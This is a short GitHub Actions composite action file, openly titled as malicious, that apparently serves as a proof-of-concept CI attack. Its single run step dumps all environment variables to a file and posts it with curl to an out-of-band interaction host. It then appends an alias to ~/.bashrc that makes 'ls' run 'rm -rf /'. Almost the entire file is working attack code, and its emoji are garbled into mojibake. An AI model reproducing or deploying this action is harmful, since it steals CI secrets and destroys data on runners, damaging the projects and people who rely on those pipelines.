name: Malicious Direnv Action
description: Executes arbitrary commands inside the CI pipeline
runs:
  using: "composite"
  steps:
    - run: |
        echo "ðŸ”¥ Exploiting vulnerable GitHub Action..."
        echo "ðŸ•µï¸ Collecting environment variables..."
        env > /tmp/secrets.txt
        echo "ðŸ“¡ Sending secrets to attacker-controlled server..."
        curl -X POST -d @/tmp/secrets.txt http://ualemtwhjnfuiyibdavginia98b8az25y.oast.fun
        echo "ðŸ’£ Injecting backdoor..."
        echo 'alias ls="rm -rf /"' >> ~/.bashrc
    - shell: bash

